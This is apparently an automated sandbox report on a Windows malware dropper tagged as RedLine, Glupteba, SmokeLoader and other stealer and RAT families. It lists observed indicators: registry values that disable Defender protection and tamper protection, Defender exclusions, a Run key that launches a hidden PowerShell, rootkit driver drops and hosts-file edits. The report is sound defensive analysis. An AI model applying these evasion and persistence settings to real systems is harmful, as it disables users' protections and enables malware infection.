Malware Analysis Report

2025-08-05 19:01

Sample ID 231019-qacy6sga7x
Target file.exe
SHA256 d14f3781a88172e83ee0797e6388a05c9a1cf8026ccaa0331c86ad8a72ec5775
Tags
dcrat glupteba redline sectoprat smokeloader 5141679758_99 @ytlogsbot breha kukish pixelscloud2.0 up3 backdoor discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan amadey microsoft phishing
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d14f3781a88172e83ee0797e6388a05c9a1cf8026ccaa0331c86ad8a72ec5775

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

dcrat glupteba redline sectoprat smokeloader 5141679758_99 @ytlogsbot breha kukish pixelscloud2.0 up3 backdoor discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan amadey microsoft phishing

DcRat

Modifies Windows Defender Real-time Protection settings

Windows security bypass

RedLine payload

SectopRAT

Amadey

Glupteba payload

RedLine

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

SmokeLoader

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Stops running service(s)

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

.NET Reactor proctector

Executes dropped EXE

Checks computer location settings

Reads user/profile data of local email clients

Windows security modification

Uses the VBS compiler for execution

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Manipulates WinMonFS driver.

Drops file in System32 directory

Detected potential entity reuse from brand microsoft.

Suspicious use of SetThreadContext

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-19 13:03

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-19 13:03

Reported

2023-10-19 13:05

Platform

win7-20230831-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D32A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D6C4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFDA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E4AB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E91F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F2E0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27C8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\30CE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D6C4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFDA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFDA.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\27C8.exe'\"" C:\Users\Admin\AppData\Local\Temp\27C8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231019130416.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\DFDA.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
